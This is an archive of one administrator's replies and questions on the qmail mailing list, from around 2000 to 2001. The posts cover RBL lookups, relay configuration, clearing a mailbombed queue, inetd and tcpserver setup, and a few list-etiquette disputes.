Re: rblsmtpd and mail-abuse.org's DNS servers
On Thu, 2 Aug 2001, Derek Callaway wrote: Right, I guess I should have said that I already read those pages before I posted this message. I'm looking for a _free_ workaround to this problem. TIA There is no workaround. The resolver is going to wait for the connection to time out, thus causing your delay. The workaround is to either find another RBL list source that runs a reliable, free network, or when it does have hiccups, remove them, or suffer through the delays. -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 1:45pm up 329 days, 19:14, 5 users, load average: 0.07, 0.18, 0.15
Re: mailbombed
Jon, we recently had a similar problem (but not exactly) and ran into a cool python util we found on the qmail homepage: It goes through the queue and moves the files into a filter dir, and you can do what you want with them from there.. http://www.redwoodsoft.com/~dru/programs/mailRemove.py You can specify a string and it will move those mails with that string. On Tue, 17 Jul 2001, Jon Rust wrote: A user on a mailserver that we secondary for (don't get me started) has been mailbombed. Currently there are literally 10's of thousands of messages in my queue trying to deliver to him. My mail server's running at a oad of 8 right now. How can I clear out all these messages easily? They are all the same size, so I could use find to look through mess for the file names, then remove them from mess, info and remote. Does that work? Should I stop qmail-send before doing this? THanks, jon -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 5:10pm up 313 days, 22:39, 4 users, load average: 0.24, 0.37, 0.28
Re: ReiserFs and qmail
On Tue, 19 Jun 2001, Nick (Keith) Fish wrote: I am not sure about the recommendation to lower the conf-split, since, again, I am not in any way familiar with ReiserFS's operation. Generally you want a large split since filesystems perform better with many directories with a couple of files than a few directories with lots of files. My advice, test it for yourself; just make sure you are using a prime number for the split. ReiserFS negates the need for this, as that is one of the strong suits of the FS... -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 6:15pm up 285 days, 23:44, 3 users, load average: 0.00, 0.04, 0.07
Re: NAKEDWIFE.EXE Virus - Filter available (Peter's problem solved:)
Hrmm, i wonder how you would go about adding scanning ability to every "virtual" user with vmailmgr? Say, every virtual account under the user 'usermail' for example. On Thu, 8 Mar 2001, Peter Peltonen wrote: | | I got it finally working vmailmgr. Here's what I did: | | Opened the script in pico, copied the contents and saved it to another text | file. I suppose it removed the ^M characters (how did they end up there, were | they there orignally or did Netscape just add them, dunno). | | Then added these lines (thanks to Peter Green) to my | /home/virtualdomain1/.qmail-user1 file: | | --snip-- | |/var/qmail/bin/checkattach | ./users/user1/ | --snip-- | | | Thanks for all who offered their help. | | Peter | -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 11:10am up 182 days, 17:39, 4 users, load average: 0.05, 0.12, 0.15
Re: Inter7 introduces new software: vQregister
Inter7 writes alot of qmail software that is very ontopic for much of this list. I for one dont have a problem with them posting announcements If your opinion differs from his, thats fine. If you dont like his attitude, thats fine. But please dont suggest that his post is off topic and wasting your bandwidth. Your whining is wasting mine. Lesson - delete it, or get off the list if you dont appreciate the discussion. On Sat, 24 Feb 2001, Rod... Whitworth wrote: | On Fri, 23 Feb 2001 11:57:03 -0600, [EMAIL PROTECTED] wrote: | | Not | and lots of other stuff requoting in full his promotion which, if it had | anything to do with qmail, was only of peripheral interest to a few. | | If I was ever likely to be interested in such a product this would cause me to | look elsewhere. | | Get off my bandwidth. It costs ME not you! -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 5:00pm up 169 days, 23:29, 2 users, load average: 0.09, 0.16, 0.21
Re: deny huge attaches
Yes, /var/qmail/control/databytes man qmail-smtpd On Mon, 19 Feb 2001, Sumith Ail wrote: | Hi | | Isn't there something like, which can deny messages on size rather than type. | | - Sumith -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 9:15pm up 166 days, 3:44, 3 users, load average: 0.01, 0.12, 0.15
Re: help needed
You probably need to setup your machine to relay properly, it sounds like you are using the rcpthosts as a substitute for this. If i'm wrong, did you kill -HUP the qmail-send process after you added this to rcpthosts? If im right, see: http://web.infoave.net/~dsill/lwq.html#relaying On Mon, 8 Jan 2001, I.Herman wrote: | I am getting the following all of a sudden. My control files all have that | domain in them. | | Here is what I'm getting. This is a normal user account. | | [EMAIL PROTECTED]: | x.x.x.x does not like recipient. | Remote host said: 554 [EMAIL PROTECTED]: Recipient address | rejected: Relay access denied | Giving up on x.x.x.x. | -- | Izzie M. Herman | ** | http://www.madhorizons.com | "Under construction and coming to a webpage near you." | -- John Gonzalez / [EMAIL PROTECTED] / [EMAIL PROTECTED] Tularosa Communications, Inc. (505) 439-0200 voice / (505) 443-1228 fax http://www.tularosa.net / ASN 11711 / JG6416 [--[ sys info ]---] 4:55pm up 123 days, 23:24, 4 users, load average: 0.27, 0.34, 0.29
Logging with checkvpw and qmail-pop3d problems?
I just recently migrated all my customers over to a new machine with RAID. Everything _seems_ to be working fine. I have some users that are calling up telling me they cant connect to the pop3 server even though they havent changed anything. Any time i test it from here by telnetting to port 110 and logging in as them it works fine. It also works fine for 95% of all of our users. Sometimes having them reboot fixes the problem, or removing the account and reinstalling the account (in outlook express) fixes it. I'm trying to get some logging going on the qmail-pop3d daemon to see whats up. I modified russ nelsons script to do it, but the $USER and $HOME variables dont work because checkvpw is totally different. Does anybody know what variable i would need to get checkvpw to log properly with qmail-pop3d? -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:30am up 35 days, 14:59, 5 users, load average: 0.94, 0.54, 0.42
AMAVIS, others, stopping QAZ, and other vbs viruses?
Are the above virus scanners able to stop the new vbs type viruses, or only the traditional embedded exe/com payloads? -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:15am up 25 days, 14:44, 4 users, load average: 0.34, 0.25, 0.16
RE: Humorous
Maybee it's not the peoples on the lists JOB to support users that are too lazy to try and help themselves. Maybee the person writing the article could have asked in a manner that would prompt list users to be more apt to reply to him. Maybee the person writing the article asked a simple question contained in the FAQ, and|or did not paste necessary log file info for proper answering. Perhaps, i will give the person writing the article a full refund for the services that he paid the list for? Would this be appropriate? On Wed, 20 Sep 2000, Greg Kopp wrote: | It's too bad that the article was somewhat accurate. Although I cannot say | that I have experienced the same kind of treatment, I have seen it, and it | is deplorable. I don't pretend I am an expert on qmail, but I have been | successful with several installations of it. Maybe I've been lucky. | | For those of you reading this that have been a party to this undesirable | beahavior, ask yourself this question: | | Were you born with all the knowledge you now posess? Have you studied the | source code to every program you use to determine it's use and function? Or | did someone, somewhere, somehow, answer a question or two for you? Have you | ever read a FAQ, a doc, or (gasp) the replies on a mailing list? | | Maybe you're not the genius you thought you were. | | My 2 cents only. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:10am up 13 days, 14:39, 5 users, load average: 0.13, 0.15, 0.15
RE: Humorous
Your original post served no purpose. It had no point. This post here, serves no purpose and has no point. No one called him a moron. The original poster ruffled the feathers by posting what he posted on linuxpeople.cc -- not here. You rehashed his post here and 'backed' his argument. I am simply trying to get a point across to you that this list is by no means obligated to help anyone out. The user felt that we were under some obligation, and you seemed to agree with him. This is not the case. Any help here should be considered gratis, and not expected. I dont know where you got 'calling him a moron publicly' from -- i never called anyone a moron. On Wed, 20 Sep 2000, Greg Kopp wrote: | And you're trying to tell me the orignal poster had an attitude? | | Sorry, my intention was not to ruffle feathers. Yes, there are those that | can't read a manual or an FAQ. But it was a while after I started using | qmail that I discovered the LWQ page. I did do it all on my own, digging up | as much information as I could. I guess it's the compasionate side of me. I | know how complex it can be. When I see a question on the list that is | obviously newbie-ish, I typically send them a PRIVATE email telling them | where to find the asnwer, or I just give it to them straight out if it's | simple enough. | | I just think, IMHO, that it's not for me to PUBLICLY call a moron a moron. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:20am up 13 days, 15:49, 5 users, load average: 0.26, 0.23, 0.64
Re: comparison vmailmgr - inter7
On Fri, 15 Sep 2000, Clemens Hermann wrote: | Now I need to choose one of the two tools but I am not sure which would be | the better choice for my purpose. It would be great if someone could give me | a hint, I need the following things: | | virtual users We do this currently, with vmailmgr. | databases for users and aliases We do not do this currently with vmailmgr, altho it should be possible. | pop access We do this currently with vmailmgr. | imap access We do this currently with vmailmgr, and courier-imap -- which is written by Mr. Sam i believe. (inter7 guy) | quota support vmailmgr has support for quota built in, altho i dont use it. | html-mail-administration vmailmgr has this with oliver mueller(???)'s Omail. | webmail We use TWiG in conjunction with courier-imap and vmailmgr. Tho, many other combinations work flawlessly as well. | I did not see webmail in the vmailmgr package, does sqwebmail run with the | vmailmgr without problems? | Thanks in advance for any advice which of the two I should use | | Clemens Please note, i have no experience with the inter7 virtual package So it might be awesome. We've been using vmailmgrd and havent had a single problem in 2+ years, so we havent bothered to look at anything else. If it aint broke, dont fix it. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:10am up 8 days, 13:39, 5 users, load average: 0.09, 1.60, 1.88
Re: Open relay test.
On 8 Sep 2000, John R. Levine wrote: | (Friendly hint: if you ignore the ugly blinking message and send me | mail anyway saying that the tester claimed that your system is an open | relay because it accepted the test message, I'll write back and call | you a moron.) | Hrmm.. i just ran the test through my servers john, and for some reason, i dont see any blinking text... only in pure black text: RSET 250 flushed MAIL FROM:[EMAIL PROTECTED] 250 ok RCPT TO:"relaytest%abuse.net" 250 ok Relay test result Hmmn, at first glance, host appeared to accept a message for relay. THIS MAY OR MAY NOT MEAN THAT IT'S AN OPEN RELAY. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 1:10pm up 1 day, 18:39, 3 users, load average: 0.22, 0.12, 0.10
Re: Slightly Off Topic
I think he's asking more of a way to supply two different gateways on his linux box. I have never messed with this, however, your idea is good. You can ping your gateway and if x number of packets are dropped, then you just rerun the route command and change the gateway/interface. fping should do what you want. On 5 Sep 2000, Chris K. Young wrote: | Quoted from Shane Wise: | I have 2 dsl connections to the internet with seperate providers. As it | stands know if the one with the default route dies I am sunk unless I am | here to change. | | Is there a way to automatically tell when one of the routes will fall | over? If so, just have a script automatically rewrite ``smtproutes'' | when that happens. | | ---Chris K. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:00am up 117 days, 14:03, 3 users, load average: 0.42, 0.23, 0.14
Re: ORBS doesn't like me :(
On Tue, 5 Sep 2000, Johan Almqvist wrote: | On Tue, Sep 05, 2000 at 04:42:45PM +0200, Peter van Dijk wrote: | On Tue, Sep 05, 2000 at 10:37:32AM -0400, Andy Meuse wrote: | Hmmm. I removed my rcpthosts file. | Put it back. Without an rcpthosts file, you are an open relay. | | That's always surprised me. I would have assumed that qmail would | default to control/me if rcpthosts is empty. Any reason why it doesn't? I think this has been requested by some list users in the past, but it's not that big of a deal. All it does is secure someone from blowing their foot off on accident. Of course, with the behavior as default, them being put on antispam lists might be a worse "long term" effect, as it's hard to get off some of the lists to a newbie. Oh well, i guess it's punishment for not reading the docs properly -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:45am up 117 days, 15:48, 4 users, load average: 0.10, 0.18, 0.18
Re: Book: 'Running qmail'
Many have mentioned in the past that the author of this book has written other very poor books, and that they felt ashamed to throw it away. The grabage was too good for the book, IIRC. On Wed, 6 Sep 2000, Russell Davies wrote: | I just saw my first qmail text in a local bookstore, entitled "Running | qmail". It's published by sams or someone, can anyone vouch for the | quality (or lack thereof) of this book? | | r. | | -- | Russell Davies | UNIX Systems Administrator | Deutsche Bank | -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 7:35pm up 118 days, 1:38, 5 users, load average: 0.18, 0.19, 0.15
Re: xinetd and qmail-pop3d
Most of the people on the list either choose two methods: 1. The lazy method, use inetd. Works fine, and most systems are already setup for inetd. 2. The good method. Use tcpserver. tcpserver, also written by DJB is fast, stable, and can be secured much like inetd, but with more functionality. I dont have alot of experience with xinetd, but if you are going to do some work into getting it to work, you might want to look at using tcpserver instead. tcpserver can be found at: http://cr.yp.to/ucspi-tcp.html On Tue, 5 Sep 2000 [EMAIL PROTECTED] wrote: | Hello, | | I have been trying to set up qmail and xinetd. No problem with the | smtp part, it works perfectly... but I was unable to set up qmail-pop3d | correctly. Anyone has experience with this? Is there any disadvantage to | use xinetd with qmail? | | Thanks in advance | | Paco Gracia | Director Técnico | Amira Sistemas -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:40am up 117 days, 16:43, 5 users, load average: 0.51, 0.19, 0.13
RE: ORBS doesn't like me :(
On Tue, 5 Sep 2000, Andy Meuse wrote: | Here is a recap of my situation. ORBS says I'm an open relay. I had no | rcpthosts file so there you go. When I create a rcpthosts file local users | can't send remote mail. You need to read LWQ, and specifically, the section on selective relaying. http://web.infoave.net/~dsill/lwq.html#relaying http://www.palomine.net/qmail/relaying.html http://www.palomine.net/qmail/selectiverelay.html | I thought I read that the :allow is redundant since the default is to allow | any connection? It is redundant. It's put in there to be syntaxtically correct in case the default behavior changes in the future. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:50am up 117 days, 16:53, 4 users, load average: 0.03, 0.16, 0.16
Re: You sure do (was Re: I have a problem)
no no no, you've got it all wrong. He needs to have a close inspection of the quazidariarian, especially section 6.4.A of the manual. Surely, that will fix the problem. On Tue, 5 Sep 2000, Stephen Bosch wrote: | Ima Guru wrote: | | I have a problem with qmail. Can someone tell me how to fix it? Thanks! | | Sure! Reconfigure your frombulator and make sure that the permissions | are correct on your flarm scripts. | | HTH, | | Stephen | -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:55am up 117 days, 16:58, 4 users, load average: 0.29, 0.24, 0.19
List performance?
Has anyone else noticed that the list seems to be performing sluggishly today? Normally i send a message to the list and it comes back within 10 seconds (if that's believable, given the number of subscribers) Today it seems to be taking upwards of the 2-5 minute range. I know this is _more_ then acceptable, and is still quicker then most lists, however, this list is usually faster? -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:10am up 117 days, 17:13, 4 users, load average: 0.09, 0.14, 0.16
RBL/MAPS/DUL etc. without rblsmtpd?
Am i to understand that rblsmtpd's devlopment has ceased? I think DJB's page says some mention of that, and also instructs that the functionality has been introduced into tcpserver now. LWQ still makes mention of using rblsmtpd, and i'm trying to set this up on a new server i'm toying with. Anybody know any good instructions on setting these black hole lists up with tcpserver? -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:20am up 111 days, 14:23, 2 users, load average: 0.06, 0.10, 0.13
Re: RBL/MAPS/DUL etc. without rblsmtpd?
On Wed, 30 Aug 2000, Petr Novotny wrote: | -BEGIN PGP SIGNED MESSAGE- | Hash: SHA1 | | On 30 Aug 2000, at 8:24, John Gonzalez/netMDC admin wrote: | | Am i to understand that rblsmtpd's devlopment has ceased? I think | DJB's page says some mention of that, and also instructs that the | functionality has been introduced into tcpserver now. | | You're reading it wrong. It says that rblsmtpd became part of | ucspi-tcp package, not of tcpserver. Get the newest ucspi-tcp from | http://cr.yp.to/ucspi-tcp.html and when you build the programs, | rblsmtpd gets built, too. Ah :) no wonder i cant find any information on anything but rblsmtpd :) I thought perhaps everybody was being lazy and hadnt switched over to the 'new method' yet :) -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:30am up 111 days, 14:33, 3 users, load average: 0.11, 0.13, 0.13
Problems with rblsmtpd again..
I'm sure it's something i'm doing, but for some reason, whenever i add rblsmtpd stuff to my qmail-smtpd startup script, it gets fubar'ed. I have the normal stuff commented out, which if i put it back it works fine. With the rblsmtpd stuff in there, when telnetting to port 25, it's just dead... I'm sure it's some kind of syntax error, but i cant figure it. This is also a patched rblsmtpd for the new MAPS no TXT records, i dont think that has anything to do with it tho, any ideas? Here's the relevant info: oblivion:/var/qmail/supervise/qmail-smtpd# cat run #!/bin/sh QMAILDUID=`id -u qmaild` NOFILESGID=`id -g qmaild` exec /usr/local/bin/softlimit -m 400 \ /usr/local/bin/tcpserver -v -p -x /etc/tcp.smtp.cdb \ -u $QMAILUID -g $NOFILESGID 0 smtp \ /usr/local/bin/rblsmtpd -rrbl.maps.vix.com \ /usr/local/bin/rblsmtpd -rdul.maps.vix.com \ /usr/local/bin/rblsmtpd /var/qmail/bin/qmail-smtpd 21 #/usr/local/bin/tcpserver -v -p -x /etc/tcp.smtp.cdb \ #-u $QMAILDUID -g $NOFILESGID 0 smtp /var/qmail/bin/qmail-smtpd 21 -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)439-0200/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:25am up 111 days, 16:28, 3 users, load average: 0.41, 0.22, 0.20
RE: Dare I ask this question....
What's sad is that even under those circumstances, qmail would probably be more secure and stable/speedy then any NT MTA :) On Mon, 26 Jun 2000, Chris Tolley wrote: Download (and pay $$$) VMWare for NT and run Qmail under Linux in a virtual machine...nasty but it would work ;) -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 6:25pm up 47 days, 28 min, 3 users, load average: 0.26, 0.31, 0.19
Re: An unfortunate confluence of interfaces
Russ, would it be possible to have the email delivered to a different user and have that users .qmail file copy all the zone updates to tinydns's directory? Or even a 2 minute interval cron job that does basicly the same thing? On Mon, 26 Jun 2000, Russell Nelson wrote: Oops. I'm sure there's a way out of this, but it's disappointing that the simplest possible way to hook these programs together does not work. -- -russ nelson [EMAIL PROTECTED] http://russnelson.com -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:20pm up 47 days, 3:23, 3 users, load average: 0.24, 0.16, 0.10
Re: ip address
Vince, i would love to help you out but i'm not sure i understand your problem. This message and the following message are very confusing... from what i gathered, when you remove your 'gateway' on the machine, your mails stop flowing? Is this correct? As for only seeing ip addresses in the logs, that's fine. Jun 23 01:14:02 ns1 qmail: 96172.203867 delivery 33995: success: 206.29.138.8_accepted_message./Remote_host_said:_250_ok_961744098_qp_7070/ Jun 23 01:20:52 ns1 qmail: 961744852.911494 delivery 33997: success: 206.29.138.8_accepted_message./Remote_host_said:_250_ok_961744509_qp_8059/ Jun 23 01:29:13 ns1 qmail: 961745353.594793 delivery 34005: success: 216.33.151.135_accepted_message./Remote_host_said:_250_Requested_mail_action_okay,_completed/ On Fri, 23 Jun 2000, Vince wrote: | | | why is that in my qmail/maillog when i send email the logs is like this | | "delivery 20: success: | 216.42.80.32_accepted_message./Remote_host_said:_250_ok_961742865_qp_39020/" | | | why there is an ip address 216.42.80.32 there may be thats the problem why | my mails are gone in my qmail machine but when i send to to other like | hotmail account i succesfully got the mail. | | | | -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 1:25am up 43 days, 7:28, 3 users, load average: 0.08, 0.11, 0.11
Re: Too load ! (fwd)
Just curious as to wether this persons argument about qmail not complying with RFC 821 is correct or not? Anyone? -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 2:00pm up 42 days, 20:03, 3 users, load average: 0.16, 0.54, 1.30 -- Forwarded message -- Date: Fri, 23 Jun 2000 07:37:43 +1200 (NZST) From: Alan Brown [EMAIL PROTECTED] To: Keith Warno [EMAIL PROTECTED] Cc: Subscribers of Qpopper [EMAIL PROTECTED] Subject: Re: Too load ! On Thu, 22 Jun 2000, Keith Warno wrote: Flames will be directed to /dev/null ; this was not intended to start an MTA war. It's just a possible solution. I'm not going to flame - just point out that qmail breaches RFC 821 in several areas. It's also fairly unfriendly about bandwidth usage _and_ accepts some relay attempts, then dumps them in the postmaster box, which can result in local or proxy mailbombings. Postfix and Exim are two other alternatives to sendmail, both better behaved. Qmail _is_ useful if you run a list processor because of its high throughput abilities, but IMO it's not suitable as a general purpose mailserver. It was designed for list servers with good bounce management and it shows. AB
Re: Why not inetd?
On Tue, 6 Jun 2000, Peter Samuel wrote: I've never seen this. How? What operating system? What version of inetd? You've got me curious now. Regards Peter -- man inetd pop3 stream tcp nowait.120 root /var/qmail/bin/tcp-env tcp-env.. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:55am up 26 days, 17:21, 4 users, load average: 0.15, 0.19, 0.18
Re: Why not inetd?
I'm not following??? On Wed, 7 Jun 2000, clemensF wrote: John Gonzalez/netMDC admin: On Tue, 6 Jun 2000, Peter Samuel wrote: I've never seen this. How? What operating system? What version of inetd? You've got me curious now. man inetd this is one of those things. we are used to spend five minutes on inetd.conf using vendor-supplied-template-files-or-example-snippets :) clemens -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:45pm up 27 days, 3:11, 2 users, load average: 0.03, 0.14, 0.16
Re: Why not inetd?
On Mon, 5 Jun 2000, Peter Samuel wrote: It has a rate limiting "feature" whereby it will stop servicing a port for 10 MINUTES if it thinks the rate of incoming connections is too high (I have flat lined a remote inetd with qmail-remote from a 14k4 modem). tcpserver doesn't care about rate, it just cares about simultaneous connections. Regards Peter -- Peter Samuel[EMAIL PROTECTED] While i agree with Peter that tcpserver is superior, i dont want people getting the wrong idea of inetd. inetd by default has the above behaviour, but can be overridden in the configuration file to accept any number of connections. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:00pm up 25 days, 17:26, 3 users, load average: 0.62, 0.29, 0.20
Re: Qpopper 2.53 remote problem, user can gain gid=mail (fwd)
On 30 May 2000, Russ Allbery wrote: John Gonzalez/netMDC admin [EMAIL PROTECTED] writes: Qpopper works fine for us, there is also a server-mode directive to change this default behavior to be more like a regular pop server, it will NOT copy the file and cause chunking on the HD. We use qpopper currently in a high-volume environment, but I definitely wouldn't describe it as "fine." We have a bunch of local patches to try Like i said originally... we use qpopper, and it works fine for us. Your mileage however, may vary. We are a small shop, and dont have many customer accounts on this box. It serves our virtual domains well, and on our busy server where our dialup account mail is stored, we use maildir and qpop-3d. There isnt enough traffic to max out the box, and i believe that even a poorly coded pop3 server should be able to handle a light load =) I'm not in a position to stress test the box, i have neither the time, nor the customer base, nor the will or want to do it just for shits and grins... But, as always, everyones needs are different. It filled a gap when we first started, and aside from the security flaws that pop up somewhat regularly, we've been quite happy. Besides, the price was right =) -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:55pm up 19 days, 23:21, 4 users, load average: 0.53, 0.48, 0.43
Re: Qpopper 2.53 remote problem, user can gain gid=mail (fwd)
